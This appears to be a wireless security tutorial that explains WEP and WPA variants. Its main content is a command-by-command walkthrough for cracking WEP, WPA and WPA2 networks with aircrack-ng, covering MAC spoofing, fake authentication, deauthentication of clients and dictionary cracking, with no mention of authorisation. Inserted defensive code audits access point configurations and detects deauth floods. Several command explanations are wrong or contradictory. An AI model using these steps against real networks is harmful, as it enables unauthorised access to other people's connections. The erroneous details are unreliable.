Wireless Security
Types of Security
WEP
WEP (Wired Equivalent Privacy) is an old encryption type. It's used extensively in
wireless networking even though it's quite easy to hack into. It is the default
encryption on many wireless routers and as a result it is currently the most
commonly used. Use this if you are not too worried about a geek hacking in and
stealing your internet connection. The chances are small. Otherwise go for
something better.
WPA
WPA (Wi-Fi Protected Access) addresses the shortcomings of WEP and is much more
difficult to hack. WPA came out around 2002. The geek next door may take 10
minutes to hack your WEP, but may take a day or two to hack WPA. WPA was the
interim format, while WPA2 is the final, more secure, version.
WPA-TKIP
Security type WPA with encryption type TKIP. TKIP (Temporal Key Integrity
Protocol) is used within WPA above. This solution is very hard to hack, but there is a
flaw in the encryption which presents a slight vulnerability. The great thing about
TKIP is that it is compatible with older hardware (pre-2003 wireless network cards).
WPA-AES
Advanced Encryption Standard. AES is not compatible with pre-2003 hardware but is
almost impossible to hack if a good key/passphrase is chosen. The US government
has adopted AES as its standard encryption. It is used in the final version of
WPA (WPA2).
WPA-PSK
PSK stands for Pre-Shared Key. All of the above use PSK (Pre-Shared Key), which
just means you have chosen a passphrase or key that is known to both the router
and the computer so they can connect to each other.
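The choices described above (WEP, WPA with TKIP, WPA2 with AES, and the quality of the pre-shared passphrase) are all visible in an access point's configuration. As an added example, not code from the original page, the following script audits a hostapd-style configuration for exactly those weak choices: WEP keys present, WPA (version 1) still allowed, TKIP as a pairwise cipher, and a short passphrase. The configuration keys used (`wpa`, `wpa_key_mgmt`, `wpa_pairwise`, `rsn_pairwise`, `wpa_passphrase`, `wep_default_key`, `wep_key0`) are real hostapd keys; the three sample configurations are constructed for this example, the 20-character passphrase floor is this example's own threshold rather than a standard, and only explicitly configured values are checked (hostapd's built-in defaults are not modelled).

```python
"""Audit a hostapd-style access point config for weak wireless security choices.

Added example; not from the original page and not part of hostapd.
"""

# Constructed sample 1: WEP, the default on many older routers.
WEP_CONFIG = """
interface=wlan0
ssid=HomeNet
channel=6
wep_default_key=0
wep_key0=0123456789
"""

# Constructed sample 2: mixed WPA/WPA2 (wpa=3), TKIP allowed, short passphrase.
MIXED_CONFIG = """
interface=wlan0
ssid=HomeNet
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=TKIP CCMP
wpa_passphrase=password
"""

# Constructed sample 3: WPA2 only, AES (CCMP) only, long passphrase.
HARDENED_CONFIG = """
interface=wlan0
ssid=HomeNet
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=correct-horse-battery-staple-2024
"""


def parse_config(text):
    """Parse hostapd's key=value syntax; '#' lines and blank lines are ignored."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit(text, min_passphrase_len=20):
    """Return a sorted list of finding codes for the configuration text.

    min_passphrase_len is this example's own threshold (assumption), chosen
    well above the 8-character minimum that WPA requires.
    """
    conf = parse_config(text)
    findings = set()

    # Any wep_key0..wep_key3 or wep_default_key means WEP is configured.
    wep = any(k.startswith("wep_key") or k == "wep_default_key" for k in conf)
    if wep:
        findings.add("WEP_ENABLED")

    # hostapd's 'wpa' is a bit field: bit 0 = WPA (version 1), bit 1 = WPA2/RSN.
    try:
        wpa = int(conf.get("wpa", "0"))
    except ValueError:
        wpa = 0
    if wpa == 0 and not wep:
        findings.add("NO_ENCRYPTION")
    if wpa & 1:
        findings.add("WPA1_ALLOWED")

    # Pairwise ciphers: wpa_pairwise applies to WPA, rsn_pairwise to WPA2.
    ciphers = set()
    if wpa & 1:
        ciphers.update(conf.get("wpa_pairwise", "").split())
    if wpa & 2:
        ciphers.update(conf.get("rsn_pairwise", "").split())
    if "TKIP" in ciphers:
        findings.add("TKIP_ALLOWED")

    # Passphrase length: 8..63 is what WPA accepts; below our floor is weak.
    if wpa:
        passphrase = conf.get("wpa_passphrase")
        if passphrase is not None:
            if not 8 <= len(passphrase) <= 63:
                findings.add("PASSPHRASE_INVALID_LENGTH")
            elif len(passphrase) < min_passphrase_len:
                findings.add("PASSPHRASE_SHORT")

    return sorted(findings)


if __name__ == "__main__":
    for name, cfg in (("WEP", WEP_CONFIG), ("MIXED", MIXED_CONFIG),
                      ("HARDENED", HARDENED_CONFIG)):
        print(f"{name}: {audit(cfg) or ['OK']}")
```

Running the script reports `WEP_ENABLED` for the first configuration, `PASSPHRASE_SHORT`, `TKIP_ALLOWED` and `WPA1_ALLOWED` for the mixed one, and nothing for the hardened one, which is the WPA2/AES/PSK combination the page recommends.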
WEP Security
Step 1:
Download Backtrack (Latest Version Recommended) from the following link
http://www.backtrack-linux.org/downloads/
Step 2:
Burn the iso image on DVD and boot your laptop from DVD drive
Step 3:
Select the third boot option i.e. BOOT FROM CD or USB
Step 4:
Once you are in BackTrack, click the tiny black box in the lower left corner to load
up a "Konsole" window.
Step 5:
Type the following command
airmon-ng
It will show you the interfaces available in your system.
Note down the interface name; in this example it is wifi0.
Step 6:
airmon-ng stop wifi0
To Stop the Monitor Mode.
Step 7:
ifconfig wifi0 down
To Detach the IP Address from the Interface.
Step 8:
To Change the MAC Address (Yes, It can be spoofed !!!)
macchanger --mac 00:11:22:33:44:55 wifi0
Step 9:
To Enable Monitor Mode
airmon-ng start wifi0
Step 10:
To see available access points
airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Note down the BSSID, CH and ESSID somewhere, in Notepad or on paper.
Step 11:
To Start Monitoring of a particular Wireless Access Point
airodump-ng -c (channel) -w (file name) --bssid (bssid) wifi0
Replace
(channel) with the CH which you already noted
(file name) with any name of your choice
(bssid) with the BSSID which you already noted
Leave this console as it is and start a new console
Step 12:
To Deauthenticate and Authenticate ourselves.
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wifi0
If you don’t get the Association Successful message, then keep on trying until you
succeed.
Step 13:
To Attack on the Access Point.
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wifi0
Well, if you don’t see ARP ACK and the sent packets are not increasing or are still 0, then it
means no one is accessing that network. But don’t worry, you have an optional step.
Leave this console as it is and start a new console
Step 14: (REQUIRED ALL THE TIME)
To choose the packets to get the key
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:55 wifi0
Step 15:
aircrack-ng -b (bssid) (filename)-01.cap
Just wait and watch..... Backtrack will do the rest of the work.
Hurray, we got the key. Remove the “:” so that, as in our screenshot, the key will be
7D0005F98DC9E489F211C54998
WPA Security
Step: 1
airmon-ng
To get the list of the available access points.
Step: 2
airmon-ng stop wlan0
To disable the monitor mode.
Step: 3
macchanger --mac <New Mac, i.e. 00:11:22:33:44:55> wlan0
To change your MAC. Yes, it can be changed!!! Once again!
Step: 4
airmon-ng start wlan0
To put the interface in the monitor mode.
Step: 5
airodump-ng wlan0
To see the available access points.
Step: 6
airodump-ng -c <channel num> -w <Create file and write into it> --bssid
<router/access point mac> wlan0
To set the channel num, bssid and where to save the captured data.
Step: 7
aireplay-ng -0 5 -c <client which is connected to the router> -a <access point> wlan0
0 = is to deauthenticate the user.
5 = for dictionary attack.
It will deauthenticate the user and quickly authenticate him once again, but
meanwhile we will also be authenticated… FAKE AUTHENTICATION!!
Step: 8
aircrack-ng <captured data filename which we created> -w <dictionary file path>
WPA2 Security
Step: 1
airmon-ng
To get the list of the available access points.
Step: 2
airmon-ng stop wlan0
To disable the monitor mode.
Step: 3
macchanger --mac <New Mac, i.e. 00:11:22:33:44:55> wlan0
To change your MAC. Yes, it can be changed!!! Once again!
Step: 4
airmon-ng start wlan0
To put the interface in the monitor mode.
Step: 5
airodump-ng wlan0
To see the available access points.
Step: 6
airodump-ng -c <channel num> -w <Create file and write into it> --output-format ivs
mon0
To set the channel num, essid and where to save the captured data.
Step: 7
aireplay-ng -0 1 -c <ESSID of Router> mon0
0 = is to deauthenticate the user.
1 = for the Fake Authentication.
It will deauthenticate the user and quickly authenticate him once again, but
meanwhile we will also be authenticated… FAKE AUTHENTICATION!!
Step: 8
aircrack-ng -w <dictionary file path> filename.ivs
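Both the WPA and the WPA2 procedures above depend on the `aireplay-ng -0` step, which sends deauthentication frames so that the client reconnects. From the network owner's side, that burst of deauthentication frames is the most visible sign that a handshake capture is under way, and it is cheap to detect. The following is an added example, not code from the original page or from the aircrack-ng project: a small detector that reads a constructed, simplified one-line-per-frame log of 802.11 management frames (the format, the MAC addresses and the timestamps are all made up for this example) and raises an alert for any BSSID that sees a threshold number of deauthentication or disassociation frames within a sliding time window. Because the injected frames carry the access point's own address as source, the detector keys on the BSSID and the rate rather than trusting the source field. The window and threshold values are this example's own defaults.

```python
"""Detect deauthentication floods in a log of 802.11 management frames.

Added example; not from the original page and not part of aircrack-ng.
The log format is a constructed, simplified record, not any real tool's output.
"""
from collections import defaultdict, deque

# Constructed sample log: "<seconds> <subtype> <source> <destination> <bssid>".
# AP AA:BB:CC:00:00:01 sees six deauth frames in half a second, the shape of a
# scripted deauth run; AP AA:BB:CC:00:00:02 sees a single deauth, which is
# normal when a client roams away or is timed out by the AP.
SAMPLE_FRAMES = """\
0.00 beacon AA:BB:CC:00:00:01 FF:FF:FF:FF:FF:FF AA:BB:CC:00:00:01
0.05 beacon AA:BB:CC:00:00:02 FF:FF:FF:FF:FF:FF AA:BB:CC:00:00:02
1.00 deauth AA:BB:CC:00:00:02 11:22:33:44:55:66 AA:BB:CC:00:00:02
2.00 deauth AA:BB:CC:00:00:01 DE:AD:BE:EF:00:01 AA:BB:CC:00:00:01
2.10 deauth AA:BB:CC:00:00:01 DE:AD:BE:EF:00:01 AA:BB:CC:00:00:01
2.20 deauth AA:BB:CC:00:00:01 DE:AD:BE:EF:00:01 AA:BB:CC:00:00:01
2.30 deauth AA:BB:CC:00:00:01 DE:AD:BE:EF:00:01 AA:BB:CC:00:00:01
2.40 deauth AA:BB:CC:00:00:01 DE:AD:BE:EF:00:01 AA:BB:CC:00:00:01
2.50 deauth AA:BB:CC:00:00:01 DE:AD:BE:EF:00:01 AA:BB:CC:00:00:01
3.00 beacon AA:BB:CC:00:00:01 FF:FF:FF:FF:FF:FF AA:BB:CC:00:00:01
"""


def parse_frames(text):
    """Parse the constructed record format into (time, subtype, src, dst, bssid)."""
    frames = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        t, subtype, src, dst, bssid = line.split()
        frames.append((float(t), subtype.lower(), src.upper(),
                       dst.upper(), bssid.upper()))
    return frames


def detect_deauth_floods(frames, window=2.0, threshold=5):
    """Return {bssid: alert} for each BSSID that saw at least `threshold`
    deauth/disassoc frames within any `window`-second span.

    The source address is deliberately ignored: injected deauth frames are
    sent with the AP's address in that field, so it carries no trust. The alert
    records the last qualifying window: frame count, first and last timestamp,
    and the client addresses (or broadcast) that were targeted.
    """
    recent = defaultdict(deque)
    alerts = {}
    for t, subtype, _src, dst, bssid in frames:
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[bssid]
        q.append((t, dst))
        # Drop frames that have fallen out of the sliding window.
        while t - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold:
            alerts[bssid] = {
                "count": len(q),
                "start": q[0][0],
                "end": t,
                "targets": sorted({d for _, d in q}),
            }
    return alerts


if __name__ == "__main__":
    for bssid, a in detect_deauth_floods(parse_frames(SAMPLE_FRAMES)).items():
        print(f"ALERT {bssid}: {a['count']} deauth frames in "
              f"{a['end'] - a['start']:.2f}s targeting {', '.join(a['targets'])}")
```

On the sample log this reports one alert, for AA:BB:CC:00:00:01, with six frames inside a 0.50 s window aimed at DE:AD:BE:EF:00:01; the single deauth on the other access point stays below the threshold. A broadcast destination (FF:FF:FF:FF:FF:FF) is handled the same way, since only the BSSID and the rate matter. On a real deployment the same logic would run over frames from a monitor interface, and the note that goes with any alert is the one the page itself makes: the deauth step is only useful to an attacker when the network is protected by a passphrase that a wordlist can reach.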